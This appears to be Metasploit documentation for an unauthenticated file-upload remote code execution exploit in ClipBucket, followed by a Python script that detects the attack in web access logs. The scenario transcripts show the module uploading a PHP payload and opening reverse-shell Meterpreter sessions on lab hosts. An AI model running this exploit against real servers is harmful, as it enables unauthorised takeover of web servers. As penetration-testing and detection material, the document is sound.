## Description

A malicious file can be uploaded by an unauthenticated attacker through the `actions/beats_uploader.php` script. ClipBucket < 4.0.0 - Release 4902 is vulnerable. Additional information and vulnerabilities can be viewed on Exploit-DB [44250](https://www.exploit-db.com/exploits/44250/).

## Vulnerable Application

Available at [Exploit-DB](https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip)

## Vulnerable Application Installation

Download the application:

```
wget https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip
```

Unzip:

```
unzip 60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip
```

Move into the web directory:

```
mv clipbucket-4881/upload/* /var/www/html/
```

Change owner:

```
chown -R www-data:www-data /var/www/html/
```

Follow the ClipBucket installer instructions at `http://localhost/`.

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/clipbucket_fileupload_exec`
4. Do: `set rport`
5. Do: `set rhost`
6. Do: `set lport`
7. Do: `set lhost`
8. Do: `exploit`
9. You should get a shell.

## Options

**TARGETURI**

TARGETURI by default is `/`, however it can be changed.

## Scenarios

### ClipBucket on Kali Linux

```
msf > use exploit/multi/http/clipbucket_fileupload_exec
msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.4
rhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80
rport => 80
msf exploit(multi/http/clipbucket_fileupload_exec) > set targeturi clipbucket
targeturi => clipbucket
msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4
lhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 5050
lport => 5050
msf exploit(multi/http/clipbucket_fileupload_exec) > run

[*] Started reverse TCP handler on 10.22.1.4:5050
[*] Uploading payload..
[+] Looking For Payload ....
[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php
[*] Executing Payload [ clipbucket/actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php ]
[*] Sending stage (37543 bytes) to 10.22.1.4
[*] Meterpreter session 1 opened (10.22.1.4:5050 -> 10.22.1.4:41752) at 2018-03-12 13:52:10 +0530
[+] Deleted 1520842928949a3f.php

meterpreter > sysinfo
Computer    : linux
OS          : Linux linux 4.14.0-kali3-amd64 #1 SMP Debian 4.14.17-1kali1 (2018-02-16) x86_64
Meterpreter : php/linux
meterpreter >
```

### ClipBucket on Windows 7

```
msf > use exploit/multi/http/clipbucket_fileupload_exec
msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.13
rhost => 10.22.1.13
msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80
rport => 80
msf exploit(multi/http/clipbucket_fileupload_exec) > set TARGETURI clipbucketest
TARGETURI => clipbucketest
msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4
lhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 4545
lport => 4545
msf exploit(multi/http/clipbucket_fileupload_exec) > exploit

[*] Started reverse TCP handler on 10.22.1.4:4545
[*] Uploading payload..
[+] Looking For Payload ....
[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php
[*] Executing Payload [ clipbucketest/actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php ]
[*] Sending stage (37543 bytes) to 10.22.1.13
[*] Meterpreter session 1 opened (10.22.1.4:4545 -> 10.22.1.13:49166) at 2018-03-12 14:11:10 +0530
[+] Deleted 152084407045df09.php

meterpreter > sysinfo
Computer    : AGENT22-PC
OS          : Windows NT AGENT22-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586
Meterpreter : php/windows
meterpreter >
```
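
The scenarios above leave two entries in the web server's access log: a POST to `actions/beats_uploader.php`, then a request for a `.php` file under `actions/CB_BEATS_UPLOAD_DIR/`. The Python below is an added detection example, not part of the module or its documentation; it assumes the Apache/nginx combined log format and a 10-minute correlation window, and the sample log lines and client addresses are constructed.

```python
import re
from datetime import datetime, timedelta

# Combined log format (assumed); only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# Paths taken from the page; any TARGETURI prefix may precede them.
UPLOADER_RE = re.compile(r'/actions/beats_uploader\.php(?:\?|$)', re.I)
DROPPED_RE = re.compile(r'/actions/CB_BEATS_UPLOAD_DIR/[^/?]+\.php(?:\?|$)', re.I)
WINDOW = timedelta(minutes=10)  # assumed correlation window

def find_upload_exec(lines, window=WINDOW):
    """Flag requests for .php files in the upload directory.

    'high'   = same client POSTed to the uploader within `window` beforehand.
    'medium' = script requested from the upload directory with no such POST.
    """
    last_upload = {}  # client ip -> time of most recent uploader POST
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
        ip, path = m['ip'], m['path']
        if m['method'] == 'POST' and UPLOADER_RE.search(path):
            last_upload[ip] = ts
        elif DROPPED_RE.search(path):
            up = last_upload.get(ip)
            correlated = up is not None and timedelta(0) <= ts - up <= window
            findings.append({'ip': ip, 'path': path, 'status': int(m['status']),
                             'severity': 'high' if correlated else 'medium'})
    return findings

# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2018:13:52:08 +0530] "POST /clipbucket/actions/beats_uploader.php HTTP/1.1" 200 120 "-" "-"',
    '192.0.2.10 - - [12/Mar/2018:13:52:09 +0530] "GET /clipbucket/actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php HTTP/1.1" 200 0 "-" "-"',
    '192.0.2.77 - - [12/Mar/2018:14:30:00 +0530] "GET /clipbucket/actions/CB_BEATS_UPLOAD_DIR/old.php HTTP/1.1" 404 0 "-" "-"',
    '192.0.2.50 - - [12/Mar/2018:14:31:00 +0530] "GET /clipbucket/index.php HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == '__main__':
    for f in find_upload_exec(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']:15} {f['status']} {f['path']}")
```

Because the module deletes the uploaded file after the session opens, the access log is often the only on-disk record of the file name, so these entries are worth preserving during triage.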